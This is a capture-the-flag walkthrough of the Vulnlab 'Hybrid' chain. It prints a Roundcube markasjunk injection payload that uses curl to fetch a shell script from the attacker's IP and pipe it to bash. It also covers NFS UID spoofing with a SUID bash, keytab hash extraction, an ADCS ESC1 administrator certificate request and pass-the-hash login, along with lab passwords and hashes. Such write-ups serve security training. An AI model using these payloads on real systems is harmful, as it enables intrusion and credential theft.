Vulnlab - Hybrid (Chain)

Vulnlab – Hybrid (Chain)

In this walk through, we will be going through the Hybrid (Chain) room from Vulnlab. This room is rated as Easy on the platform and it consist of exploitation of RoundCube Webmail Markasjunk filter plugin via a known POC to get the initial shell on the target. Post that, lateral movement have to be done to user Peter.Turner by abusing user ID in NFS share and getting the concerned user password in a Keepass DB. At last, abused the ADCS vulnerability to dump the hashes and got access as admin on DC. So, let’s get started without any delay.

Hybrid (Chain)

Machine Info:

TitleHybrid
IPaddress10.10.143.85 and 10.10.143.86
DifficultyEasy
OSWindows
DescriptionHybrid is an Easy Windows machine that requires exploitation of RoundCube Webmail Markasjunk filter plugin via a known POC to get the initial shell on the target. Post that, lateral movement have to be done to user Peter.Turner by abusing user ID in NFS share and getting the concerned user password in a Keepass DB. At last, abused the ADCS vulnerability to dump the hashes and got access as admin on DC.

Enumeration:

DC01.HYBRID.VL

  • I started off with a regular nmap scan. Found multiple ports opened – 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more.

$ sudo nmap -sV -sC 10.10.143.85
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-23 23:05 IST

Nmap scan report for 10.10.143.85
Host is up (0.19s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-04-23 17:35:37Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.hybrid.vl
| Not valid before: 2023-06-17T14:05:41
|_Not valid after:  2024-06-16T14:05:41
|_ssl-date: 2024-04-23T17:36:58+00:00; -1s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.hybrid.vl
| Not valid before: 2023-06-17T14:05:41
|_Not valid after:  2024-06-16T14:05:41
|_ssl-date: 2024-04-23T17:36:58+00:00; -1s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.hybrid.vl
| Not valid before: 2023-06-17T14:05:41
|_Not valid after:  2024-06-16T14:05:41
|_ssl-date: 2024-04-23T17:36:58+00:00; -1s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername:<unsupported>, DNS:dc01.hybrid.vl
| Not valid before: 2023-06-17T14:05:41
|_Not valid after:  2024-06-16T14:05:41
|_ssl-date: 2024-04-23T17:36:58+00:00; -1s from scanner time.
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: HYBRID
|   NetBIOS_Domain_Name: HYBRID
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: hybrid.vl
|   DNS_Computer_Name: dc01.hybrid.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-04-23T17:36:19+00:00
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Not valid before: 2024-04-22T17:30:12
|_Not valid after:  2024-10-22T17:30:12
|_ssl-date: 2024-04-23T17:36:58+00:00; -1s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-04-23T17:36:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.93 seconds

MAIL01.HYBRID.VL

  • I started off with a regular nmap scan. Found multiple ports opened – 22 (SSH), 25 (SMTP), 80 (HTTP), 110 (POP3) and many more.

$ sudo nmap -sV -sC 10.10.143.86
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-23 23:05 IST

Nmap scan report for 10.10.143.86
Host is up (0.18s latency).
Not shown: 989 closed ports
PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
25/tcp   open     smtp     Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING, 
53/tcp   filtered domain
80/tcp   open     http     nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Redirecting...
110/tcp  open     pop3     Dovecot pop3d
|_pop3-capabilities: SASL STLS CAPA AUTH-RESP-CODE PIPELINING RESP-CODES TOP UIDL
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after:  2033-06-14T13:20:17
111/tcp  open     rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      43067/tcp6  mountd
|   100005  1,2,3      44571/tcp   mountd
|   100005  1,2,3      54289/udp   mountd
|   100005  1,2,3      60841/udp6  mountd
|   100021  1,3,4      33561/tcp   nlockmgr
|   100021  1,3,4      34614/udp6  nlockmgr
|   100021  1,3,4      43783/tcp6  nlockmgr
|   100021  1,3,4      57552/udp   nlockmgr
|   100024  1          38457/tcp   status
|   100024  1          42362/udp6  status
|   100024  1          44284/udp   status
|   100024  1          50993/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
143/tcp  open     imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: OK LITERAL+ capabilities have LOGINDISABLEDA0001 ID IDLE SASL-IR ENABLE post-login STARTTLS Pre-login more IMAP4rev1 listed LOGIN-REFERRALS
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after:  2033-06-14T13:20:17
587/tcp  open     smtp     Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING, 
993/tcp  open     ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: AUTH=PLAIN LITERAL+ capabilities Pre-login OK ID IDLE SASL-IR ENABLE AUTH=LOGINA0001 have post-login more IMAP4rev1 listed LOGIN-REFERRALS
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after:  2033-06-14T13:20:17
995/tcp  open     ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN LOGIN) UIDL CAPA AUTH-RESP-CODE PIPELINING RESP-CODES TOP USER
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Not valid before: 2023-06-17T13:20:17
|_Not valid after:  2033-06-14T13:20:17
2049/tcp open     nfs_acl  3 (RPC #100227)
Service Info: Host:  mail01.hybrid.vl; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.43 seconds

MAIL01.HYBRID.VL:

PORT 80 (HTTP)

  • Adding hostname to the /etc/hosts file.

adding hostname in /etc/hosts

  • The web server running on port 80 has a Round Cube login panel. I tried some common creds but was denied.

Round Cube login panel

PORT 2049 (NFS)

  • Checked the available mounting points with showmount and found – /opt/share folder which we can use.

showmount -e 10.10.143.86

showmount -a 10.10.143.86

NFS Enumeration

  • Next, created a test directory and mounted it to the NFS share. Interacting with it reveals a backup.tar.gz file. Copied to my working directory and then used tar to extract its contents.

# Create a mountable directory

mkdir test

# Mount it to the NFS share

sudo mount -t nfs 10.10.143.86:/opt/share test/

# Get the backup file

cd test/
cp backup.tar.gz ~/CTF/Vulnlab/Hybrid/

# Extract its contents with tar

tar -xvzf backup.tar.gz 

mounting the share

extracting backup.tar.gz

  • The dovecot-users file reveals potential credentials for the Round cube login panel.

cat dovecot-users

[email protected]: Duckling21
[email protected]: PeterIstToll!

Exploitation:

  • Logged into the Round Cube webmail panel using found Peter Turner creds. The inbox contains a email from admin that he have enabled Roundcubes junk filter plugin to avoid spam.

Roundcubes inbox

New Spam Plugin

  • Checked the about tab and found out that the running Roundcube Webmail version is 1.6.1 and the Markasjunk filter version is 2.0.

Roundcube Webmail version is 1.6.1

  • Looked online for any known exploit for the Markasjunk filter plugin and found the below POC.

POC: https://ssd-disclosure.com/ssd-advisory-roundcube-markasjunk-rce/

  • As per the POC, we can abuse the junk filter to get a command execution on the target. For that, i created a shell script with a reverse shell one-liner in it. Then used the below payload to download and execute it on the target. We have to save this in the email field in Identities tab and then have to mark any email as Junk.

admin&curl${IFS}10.8.2.6/shell.sh${IFS}|${IFS}bash&@hybrid.vl

Entering the email address

python HTTP server

  • Got initial access on the target.

got initial access

Lateral Movement – Peter.Turner:

  • Executed Linpeas on the target and found a DB password in the roundcube config files but it doesn’t let me anywhere.

Analyzing Roundcube Files

  • Next, i tried to check the home folder of user Peter but was denied. Upon checking his user ID, i found it to be a little different.

checking the user ID

  • We can abuse the above user ID via the NFS share to get access as user Peter. For that, on our attacker machine, we have to edit the UID_MAX value in the /etc/login.defs file.

UID_MAX

  • Now, we will create a new user in our attacker machine with the same user ID and set its password.

sudo useradd uwu -u 902601108

sudo passwd uwu

su uwu

create a new user

  • Now copy the bash binary in the /opt/share folder on the target machine.

cp /usr/bin/bash .

cp /usr/bin/bash .

  • Back to our attacker machine, we will first copy the bash binary to the temp directory. Delete the one in the target share and then copied the bash binary from temp to the share. At last, changed its permissions by setting the SUID bit to it. Once we will execute it on the target machine we will get a shell as Peter.

# On attacker machine 

cp bash /tmp/
rm -rf bash
cp /tmp/bash .
chmod +xs bash

# On target machine

./bash -p

SUID bash

got access as peter.turner

Post Compromise:

  • Found a Keepass DB file in Peter’s home folder. Downloaded it to my local machine.

cat flag.txt

  • Tried peter’s roundcube password as the master password for the Keepass DB and got in.

Keepass DB output

Privilege Escalation – mail01:

  • Logged into the server via SSH as user Peter.

ssh [email protected]@10.10.143.86

b0cwR+G4Dzl_rw

ssh login as peter

  • Changed user to root using sudo and captured the root flag.

sudo su

cat flag.txt

DC01.HYBRID.VL Enumeration:

  • Using the peter.turner domain creds, i switched to the bloodhound python utility and dumped the information from the domain.

bloodhound-python -c all -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' -d hybrid.vl -gc hybrid.vl -dc DC01.hybrid.vl

bloodhound python enum

  • Analyzed the data in Bloodhound but found nothing interesting.

Analyzed the data in Bloodhound

Checking ADCS vulnerability

  • Next, i used certipy to check for the ADCS Vulnerability. Found out that the “Authenticated Users” can enroll and authenticate any user with hybrid-DC01-CA (ESC-1).

certipy find -u [email protected] -p 'b0cwR+G4Dzl_rw' -vulnerable -stdout -dc-ip 10.10.143.85

Checking ADCS vulnerability

  • We now uses old-bloodhound module to get the result in json files so that we can analyzed tin Bloodhound.

certipy find -u [email protected] -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.143.85 -old-bloodhound

getting json files

  • Downloaded the customqueries file for certify that we can use in Bloodhound. Place the file in – ~./config/bloodhound/customqueries.json

wget https://raw.githubusercontent.com/ly4k/Certipy/main/customqueries.json

Downloaded the customqueries file for certify

  • Marking hybrid-DC01-CA as the high value target and checking the shortest path to hybrid-DC01-CA

Marking hybrid-DC01-CA as the high value target

Exploitation DC01 and getting Admin:

  • We now wanted the MAIL01 NTLM hash. We can dump this from the mail01 machine at /etc/krb5.keytab.

/etc/krb5.keytab

  • Moving on, extracted the NTLM hash with KeyTabExtract script.

git clone https://github.com/sosdave/KeyTabExtract.git

cd KeyTabExtract

python3 keytabextract.py krb5.keytab

KeyTabExtract script

  • Checking size of the public key for the exploit.

openssl x509  -in ./fullchain.pem -noout -text

Checking size of the public key for the exploit.

  • Requesting certificate from the CA as administrator using certify by specifying the public key size captured before.

certipy req -u 'MAIL01$' -hashes ":0f916c5246fdbc7ba95dcef4126d57bd" -dc-ip "10.10.143.86" -ca 'hybrid-DC01-CA' -template 'HYBRIDCOMPUTERS' -upn 'administrator' -target 'dc01.hybrid.vl' -key-size 4096

Requesting certificate from the CA as administrator

  • Now again with certipy we can request administrator’s NTHash

certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.143.85

requesting administrator's NTHash

  • At last, used wmiexec to log into the domain as Administrator.

wmiexec.py [email protected] -hashes ':60701e8543c9f6db1a2af3217386d3dc'

got admin access

Also Read: Vulnlab – Data

Conclusion:

Conclusion

So that was “Hybrid (Chain)” for you. We started off with a regular nmap scan on both the hosts. Next performed some enumeration and then performed exploitation of RoundCube Webmail Markasjunk filter plugin via a known POC to get the initial shell on the target. Post that, lateral movement was done to user Peter.Turner by abusing user ID in NFS share and getting the concerned user password in a Keepass DB. Using the found password in Keepass logged in and got root on mail01. At last, abused the ADCS vulnerability to dump the hashes and got access as admin on DC. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top